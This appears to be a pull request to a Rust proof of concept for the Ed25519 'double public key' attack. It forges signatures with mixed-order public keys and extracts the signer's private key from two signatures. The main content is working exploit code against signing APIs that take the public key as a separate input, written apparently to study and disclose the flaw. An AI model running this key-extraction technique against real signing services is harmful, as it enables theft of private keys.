### PR TITLE
Mixed order points verify with some probability against non-cofactored

### DIFF
--- a/ed25519-chalkias-exploit/src/main.rs
+++ b/ed25519-chalkias-exploit/src/main.rs
@@ -2,52 +2,81 @@ use curve25519_dalek::constants::{ED25519_BASEPOINT_COMPRESSED, EIGHT_TORSION};
 use curve25519_dalek::digest::Digest;
 use curve25519_dalek::edwards::CompressedEdwardsY;
 use curve25519_dalek::scalar::Scalar;
-use ed25519_dalek::{ExpandedSecretKey, Keypair, PublicKey, Sha512, Signature};
+use ed25519_dalek::{
+    ExpandedSecretKey, Keypair, PublicKey, SecretKey, Sha512, Signature, Verifier,
+};
 use rand::rngs::OsRng;
 
 fn main() {
+    let message: &[u8] = "Hello World".as_bytes();
+    let mut csprng = OsRng {};
+    let original_keypair = Keypair::generate(&mut csprng);
     // Exploiting the sig(priv, pub, msg) api by providing a random pubkey as input.
     // Signatures with a non-matching pubkey do not verify.
-    double_pubkey_attack_using_random_pubkey();
+    double_pubkey_attack_using_random_pubkey(&original_keypair, message);
+
     // Exploiting the sig(priv, pub, msg) api by providing a mixed order pubkey as input.
-    // Signatures with a non-matching pubkey DO VERIFY. This demonstrates that just verifying a
-    // signature at signer's side does not prevent a potential attack.
-    double_pubkey_attack_using_mixed_order_pubkey();
+    // Signatures with a mixed order original pubkey DO ALWAYS VERIFY when using cofactored
+    // verification. This demonstrates that just verifying a signature at signer's side does not
+    // prevent a potential attack.
+    double_pubkey_attack_using_mixed_order_pubkey(&original_keypair, message, false);
+
+    // Exploiting the sig(priv, pub, msg) api by providing a mixed order pubkey as input.
+    // Signatures with a mixed order original pubkey WILL SUCCESSFULLY VERIFY with some probability
+    // when using non-cofactored signature verification, more precisely:
+    // with 50% probability when the small order point has order = 2
+    // with 25% probability when the small order point has order = 4
+    // with 12.5% probability when the small order point has order = 8
+    //
+    // This demonstrates that just verifying a signature at signer's side does not
+    // prevent a potential attack even when non-cofactored verification is used.
+
+    // For this example we use a keypair that combined with the signed message, it will succeed
+    // against non-cofactored verification.
+    let seeded_original_keypair = seeded_keypair(&[1u8; 32]);
+    double_pubkey_attack_using_mixed_order_pubkey(&seeded_original_keypair, message, true);
 }
 
-fn double_pubkey_attack_using_random_pubkey() {
-    let mut csprng = OsRng {};
-    let original_keypair = Keypair::generate(&mut csprng);
-
+fn double_pubkey_attack_using_random_pubkey(original_keypair: &Keypair, message: &[u8]) {
     // Generate a random keypair2 (only need the public key part)
+    let mut csprng = OsRng {};
     let keypair2 = Keypair::generate(&mut csprng);
     let pubkey2 = keypair2.public;
-    double_pubkey_attack(&original_keypair, &pubkey2, false);
+    double_pubkey_attack(original_keypair, &pubkey2, message, false, false);
 }
 
-fn double_pubkey_attack_using_mixed_order_pubkey() {
-    let mut csprng = OsRng {};
-    let original_keypair = Keypair::generate(&mut csprng);
-
+fn double_pubkey_attack_using_mixed_order_pubkey(
+    original_keypair: &Keypair,
+    message: &[u8],
+    matching_order_k: bool,
+) {
     // Generate a mixed order pubkey by adding a small order point on the original pubkey.
     // Using one of the small order points from:
     // https://github.com/dalek-cryptography/curve25519-dalek/blob/main/src/backend/serial/u64/constants.rs
     let original_pubkey = CompressedEdwardsY::from_slice(original_keypair.public.as_ref())
         .decompress()
         .unwrap();
-    let pubkey_mixed = original_pubkey + EIGHT_TORSION[2];
+
+    let pubkey_mixed = original_pubkey + EIGHT_TORSION[4];
+
     double_pubkey_attack(
-        &original_keypair,
+        original_keypair,
         &PublicKey::from_bytes(pubkey_mixed.compress().as_bytes()).unwrap(),
+        message,
         true,
+        matching_order_k,
     );
 }
 
 #[allow(non_snake_case)]
-fn double_pubkey_attack(original_keypair: &Keypair, other_pubkey: &PublicKey, mixed_key: bool) {
-    let message: &[u8] = "Hello World".as_bytes();
-
-    // Generate a random keypair1
+fn double_pubkey_attack(
+    original_keypair: &Keypair,
+    other_pubkey: &PublicKey,
+    message: &[u8],
+    mixed_key: bool,
+    matching_order_k: bool,
+) {
+    // Get secret and public part
     let secret1 = &original_keypair.secret;
     let pubkey1 = &original_keypair.public;
     let expanded_secret1: ExpandedSecretKey = (secret1).into();
@@ -63,7 +92,7 @@ fn double_pubkey_attack(original_keypair: &Keypair, other_pubkey: &PublicKey, mi
     let R1 = CompressedEdwardsY::from_slice(&sig1.to_bytes()[..32]);
     let S1 = Scalar::from_canonical_bytes(<[u8; 32]>::try_from(&sig1.to_bytes()[32..]).unwrap())
         .unwrap();
-    assert!(verify_cofactored(&pubkey1, &message, &sig1));
+    assert!(verify_cofactored(pubkey1, message, &sig1));
 
     // This is H(R1 || PUBKEY1 || M)
     let mut hash = Sha512::new();
@@ -92,7 +121,10 @@ fn double_pubkey_attack(original_keypair: &Keypair, other_pubkey: &PublicKey, mi
     // that simply verifying signatures at the signer's side before posting the signature will not
     // suffice to prevent/detect a potential exploit.
     if mixed_key {
-        assert!(verify_cofactored(&other_pubkey, &message, &sig2));
+        assert!(verify_cofactored(other_pubkey, message, &sig2));
+        if matching_order_k {
+            assert!(other_pubkey.verify(message, &sig2).is_ok());
+        }
     }
 
     // We can extract the private key by (S1 - S2) / (k1 - k2)
@@ -126,7 +158,13 @@ fn verify_cofactored(pubkey: &PublicKey, message: &[u8], signature: &Signature) 
         .unwrap())
     .mul_by_cofactor();
 
-    return eight_sb == eight_r + eight_ka;
+    eight_sb == eight_r + eight_ka
+}
+
+fn seeded_keypair(seed: &[u8]) -> Keypair {
+    let secret = SecretKey::from_bytes(seed).unwrap();
+    let public = PublicKey::from(&secret);
+    Keypair { secret, public }
 }
 
 #[test]
@@ -137,7 +175,7 @@ fn test_mixed_points() {
     let pubkey1 = CompressedEdwardsY::from_slice(keypair.public.as_ref())
         .decompress()
         .unwrap();
-    let pubkey_mixed = pubkey1 + EIGHT_TORSION[2];
+    let pubkey_mixed = pubkey1 + EIGHT_TORSION[4];
     assert_ne!(pubkey1, pubkey_mixed);
 
     let pk1 = pubkey1.mul_by_cofactor();


### PR DESCRIPTION
Exploiting the sig(priv, pub, msg) api by providing a mixed order pubkey as input. Signatures with a mixed order original pubkey WILL SUCCESSFULLY VERIFY with some probability when using non-cofactored signature verification, more precisely:
- with 50% probability when the small order point has order = 2
- with 25% probability when the small order point has order = 4
- with 12.5% probability when the small order point has order = 8

This demonstrates that just verifying a signature at signer's side does not prevent a potential attack even when non-cofactored verification is used!